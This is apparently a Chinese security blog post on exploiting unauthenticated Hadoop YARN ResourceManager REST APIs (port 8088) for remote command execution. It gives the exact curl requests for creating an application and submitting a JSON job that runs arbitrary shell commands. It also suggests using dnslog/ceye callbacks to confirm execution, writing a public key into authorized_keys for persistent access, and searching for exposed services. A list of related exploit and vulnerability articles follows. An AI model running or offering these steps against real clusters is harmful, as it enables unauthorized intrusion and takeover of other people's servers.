hadoop应用开发技术..._渗透技巧Hadoop命令执行

最新推荐文章于 2024-06-24 17:42:01 发布
最新推荐文章于 2024-06-24 17:42:01 发布
阅读量276 收藏
点赞数
文章标签: hadoop应用开发技术... 向程序发送命令失败

0X00    Hadoop介绍和漏洞原理

Hadoop是一个由Apache的分布式系统基础架构,用户可开发分布式程序,充分利用集群的威力进行高速运算和存储,实现了一个分布式文件系统(Hadoop Distributed File System)。

其中HDFS组件有高容错性的特点,并且部署在低廉的(low-cost)硬件上即可提供高吞吐量(high throughput)来访问应用程序的数据。

e4d3553d141da94c287eef3a715ba42d.png

Apache Yarn(Yet Another Resource Negotiator的缩写)是hadoop集群资源管理器系统,Yarn从hadoop 2引入,最初是为了改善MapReduce的实现,但是它具有通用性,同样执行其他分布式计算模式。

ApplicationMaster负责与scheduler协商合适的container,跟踪应用程序的状态,以及监控它们的进度,ApplicationMaster是协调集群中应用程序执行的进程。每个应用程序都有自己的ApplicationMaster,负责与ResourceManager协商资源(container)和NodeManager协同工作来执行和监控任务 。

当一个ApplicationMaster启动后,会周期性的向resourcemanager发送心跳报告来确认其健康和所需的资源情况,在建好的需求模型中,ApplicationMaster在发往resourcemanager中的心跳信息中封装偏好和限制,在随后的心跳中,ApplicationMaster会对收到集群中特定节点上绑定了一定的资源的container的租约,根据Resourcemanager发来的container,ApplicationMaster可以更新它的执行计划以适应资源不足或者过剩,container可以动态的分配和释放资源。

与job相关的命令:

1.查看 Job 信息:hadoop job -list2.杀掉 Job:hadoop  job –kill  job_id3.更多细节:hadoop job -history all output-dir4.杀死任务。被杀死的任务不会不利于失败尝试:hadoop jab -kill-task 5.使任务失败。被失败的任务会对失败尝试不利:hadoop job  -fail-task

YARN命令:

YARN命令是调用bin/yarn脚本文件,如果运行yarn脚本没有带任何参数,则会打印yarn所有命令的描述。

使用: yarn [--config confdir] COMMAND [--loglevel loglevel] [GENERIC_OPTIONS] [COMMAND_OPTIONS]
application使用: yarn application [options]

2a129fae4a3fcf63e2b75bc33bd28ea8.png

运行jar文件

用户可以将写好的YARN代码打包成jar文件,用这个命令去运行它:

yarn jar  [mainClass] args...

0X01    RCE实现

使用ROOT权限启动的Hadoop服务可根据在服务器8088端口接收用户提交的POST数据,根据其中参数执行相关job,具体实现如下:

8088端口的Applications manager:

04f977fa510ed210923f8f6aaf2f1964.png

1.申请新的application,直接通过curl进行POST请求:

curl -v -X POST 'http://ip:8088/ws/v1/cluster/apps/new-application'

返回内容类似于:

{"application-id":"application_1527144634877_20465","maximum-resource-capability":{"memory":16384,"vCores":8}}

2.构造并提交任务

构造json文件1.json,内容如下,其中application-id对应上面得到的id,命令内容为尝试在/var/tmp目录下创建test_1文件,内容也为111:

{"am-container-spec":{"commands":{"command":"echo '111' >> /var/tmp/test_1"}},"application-id":"application_1527144634877_20465","application-name":"test","application-type":"YARN"}

然后直接使用curl发送数据:

curl -s -i -X POST -H 'Accept: application/json' -H 'Content-Type: application/json' http://ip:8088/ws/v1/cluster/apps --data-binary @1.json

即可完成攻击,命令被执行,在相应目录下可以看到生成了对应文件,在8088端口Web界面可看到相关信息:

b1401e33875c9150124b21759157ce32.png

技巧:可配合ceye、dnslog测试命令执行结果。

0X02    注意事项

技巧:

1.可配合ceye以及

dnslog测试命令执行结果,或在/home/user/.ssh/authorized_keys中写入公钥。

2.搜索开放服务:

99173e0c611196c26c98eba28183d14d.png

或者port=50070

853ad7c9643fa1dfd7a52fdde83ba000.png

但此方式有三点限制:

1.是服务需管理员权限启动,执行命令也是管理员权限执行,普通用户五相关命令权限只会有失败记录,命令最终执行失败,留下难以删除的攻击记录。

3348c87c6c2e952f7e8ee916a4ccb5ee.png

2.是Hadoop的8088管理端口若使用了权限认证,会提示

AuthorizationException:"message":"Unable to obtain user name, user not authenticated

a3d6d4be400f9883e013b926b9736324.png

3.是master+slave节点数大于等于2,job任务会根据hadoop分布式机制提交到任一台节点处理,目前笔者还未找到指定namenode的方法。

34ea95126178b620a92c7546e7e09a67.png

be532991ccad13e4d7352f0af72f3e25.png

点赞 在看 转发

原创投稿作者:伞

8d0392640c42ea242e7b87c58c4db058.gif

weixin_39895486
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
hadoop漏洞_Hadoop 未授权访问漏洞(exp核心代码实现)
weixin_35758982的博客
12-06 8430
一、环境搭建:进入镜像目录:cd vulhub/hadoop/unauthorized-yarn启动环境:docker-compose up -d访问8088端口二、漏洞描述:Hadoop作为一个分布式计算应用程序框架,种类功能繁多,各种组件安全问题会带来很大的攻击面。Apache Hadoop YARN是Hadoop的核心组件之一,负责将资源分配在Hadoop集群中运行的各种应用程序,...
数据库安全:Hadoop 未授权访问-命令执行漏洞.
网络安全领域___专研者.
11-10 3651
Hadoop 未授权访问主要因HadoopYARN资源管理系统配置不当,导致可以未经授权进行访问,从而被攻击者恶意利用。攻击者无需认证即可通过RESTAPI部署任务来执行任意指令,最终完全控制服务器。
未授权访问:Hadoop 未授权访问漏洞
qq_68163788的博客
05-20 1702
Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。
Hadoop 漏洞复现
MrHatSec的博客
08-01 6118
Hadoop作为一个分布式计算应用程序框架,种类功能繁多,各种组件安全问题会带来很大的攻击面。
你的数据安全么?Hadoop再曝安全漏洞| 黑客利用Hadoop Yarn资源管理系统未授权访问漏洞进行攻击...
weixin_34112208的博客
05-08 282
2019独角兽企业重金招聘Python工程师标准>>> ...
Hadoop大数据开发基础.rar
10-14
文档为PPT,与百度文库里的Hadoop大数据开发基础为一套,里面内容相对比较基础~可做基础学习资料PPT。 【实例截图】 【核心代码】 Hadoop大数据开发基础-PPT课件 └── 37066-Hadoop大数据开发基础-PPT课件 ├── ...
hadoop-yarn.zip_The Project_com.hado_hadoop
09-24
This project contains the hadoop yarn source code along with some of my modifications, related to security features
hadoop2.7.x_winutils_exe&&hadoop_dll
06-01
标题"hadop2.7.x_winutils_exe&&hadoop_dll"暗示我们关注的是Hadoop 2.7.x版本在Windows环境下的两个关键组件:`winutils.exe`和`hadoop.dll`。这些文件对于在Windows上配置和运行Hadoop生态系统至关重要。 首先,...
hadoop_join.jar.zip_hadoop_hadoop query_reduce
09-20
Hadoop是Apache软件基金会开发的一个开源分布式计算框架,它的核心组件包括HDFS(Hadoop Distributed File System)和MapReduce。HDFS为海量数据提供了高容错、高扩展性的存储解决方案,而MapReduce则是用于并行处理...
hadoop.dll_hadoop.dall_
10-03
标题 "hadoop.dll_hadoop.dall_" 暗示了我们正在讨论的是Hadoop框架在Windows操作系统中的一个动态链接库(DLL)文件。Hadoop是一个开源的分布式计算框架,主要用Java编写,但为了在Windows上运行,可能需要特定的...
Hadoop-未授权访问漏洞复现
weixin_43071873的博客
11-18 1683
漏洞介绍: Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。 漏洞复现: 使用vulhub搭建靶场 搭建完进入镜像,成功搭建 进入靶场。靶机ip:8088 exp如下: ##!/usr/bin/env python import requests import sys targe
Word MSDT代码执行漏洞,影响用户多范围广(CVE-2022-30190)
murphysec的博客
05-31 417
CVE-2022-30190 漏洞,Word 程序使用 URL 协议调用 MSDT 时存在远程代码执行漏洞。影响用户多,影响范围广,建议用户按照官方教程禁用 MSDT URL 协议。 编号      CVE-2022-30190 标题 Word 代码执行漏洞 描述 Microsoft Office Word 是微软公司的一个文字处理器应用程序。Word 使用 URL 协议调用 MSDT 时没有做限制,导致可以执行任意远程代码。影响用户多,影响范围广,建议用户按照官方教程禁用 MSDT U
Hadoop-yarn-未授权访问漏洞
qq_42735101的博客
06-26 2089
Hadoop是由Apache基金会所开发的分布式系统基础架构,由于服务器直接开放了Hadoop的某些端口而造成了漏洞。本文是docker中的Hadoop-yarn-未授权访问漏洞复现。
Apache Hadoop YARN 远程代码执行漏洞
OSCS开源安全社区
08-26 975
Apache Hadoop YARN CapacityScheduler 中的 ZKConfigurationStore 由于没有验证从 ZooKeeper 获得的数据就进行反序列化处理,使得有权访问 ZooKeeper 的攻击者通过特制数据以 YARN 用户身份运行任意命令。建议升级org.apache.hadoop:hadoop-yarn-server-resourcemanager到 2.10.2 或 3.2.4 或 3.3.4 或更高版本...
hadoop未授权访问命令执行漏洞复现-vulfocus
c0529的博客
06-10 752
Hadoop YARN(Yet Another Resource Negotiator)的ResourceManager是集群资源管理的核心组件,负责分配和管理集群资源以及调度作业。如果ResourceManager出现未授权访问漏洞,可能允许未经认证的用户访问或操作集群资源,这可能会导致数据泄露、资源滥用或拒绝服务攻击。在这个复现中就是在组件的ui界面上出现了未授权访问漏洞。
hadoop漏洞_hadoop未授权访问漏洞
weixin_39595430的博客
12-20 617
Hadoop 默认开放了很多端口来提供 WebUI 服务,通过访问 NameNode WebUI 管理界面的 50070 端口,可以下载任意文件,所以需要对页面增加访问限制。修改core-site.xml配置文件,追加以下信息hadoop.http.filter.initializersorg.apache.hadoop.security.AuthenticationFilterInitializ...
二百四十、Hadoop——解决Hadoop 未授权访问漏洞
最新发布
tiantang2renjian的博客
06-24 1239
Hadoop——解决Hadoop 未授权访问漏洞
web渗透测试漏洞复现:Hadoop 未授权访问漏洞复现并getshell
HACKONE的博客
03-28 663
Hadoop是一个开源的分布式计算框架,由Apache软件基金会开发并维护。Hadoop主要用于处理和分析海量数据集,能够在由普通硬件构成的大规模集群上运行,具备高可靠性和高扩展性。HDFS是一个高度容错性的分布式文件系统,设计用于在廉价硬件上存储海量数据。数据会被切割成块并分布在集群中的多个节点上,以实现数据冗余和故障恢复。MapReduce:MapReduce是一个分布式编程模型,用于处理大规模数据集。它将复杂的计算任务拆分成两个主要阶段:Map阶段和Reduce阶段,允许数据并行处理。
hadoop漏洞_Apache Hadoop 存在远程权限提升漏洞(CVE-2018-11764)风险通告
weixin_39759270的博客
12-20 623
漏洞描述:ApacheHadoopweb端点被曝存在存在远程权限提升漏洞(漏洞编号:CVE-2018-11764),ApacheHadoopWeb端身份校验存在漏洞,经过身份验证的用户可以伪造成任意用户,进而造成权限提升漏洞。ApacheHadoop是一款支持数据密集型分布式应用程序并以Apache2.0许可协议发布的开源软件框架。它支持在商品硬件构建的大型集群上运行的应用程序Hadoop还...
Hadoop命令执行渗透技巧ApplicationMaster与资源管理
这些命令执行技巧渗透测试中可能会被用来探索Hadoop集群的安全性,例如,测试是否能非法控制Job执行、滥用权限或导致系统不稳定。然而,值得注意的是,这些技巧应当仅用于合法的授权测试环境,以免对生产系统造成...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值